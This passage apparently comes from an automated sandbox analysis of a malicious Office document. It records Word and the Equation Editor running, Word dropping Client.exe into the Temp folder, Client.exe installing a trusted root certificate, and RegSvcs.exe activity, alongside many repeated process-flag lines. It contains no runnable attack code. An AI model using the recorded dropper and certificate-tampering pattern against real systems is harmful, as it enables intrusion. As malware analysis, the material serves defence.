                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B0605E push edi; retn 0000h10_2_00B0606A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B00738 push ds; retn 0000h10_2_00B0081A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00B00910 push ds; retn 0000h10_2_00B0094A
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 13_2_0018D080 push 8A000000h; retf 13_2_0018D085
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 13_2_0018D6FF push 180018DCh; iretd 13_2_0018D715
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_00C28F95 push edi; ret 21_2_00C28F96
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
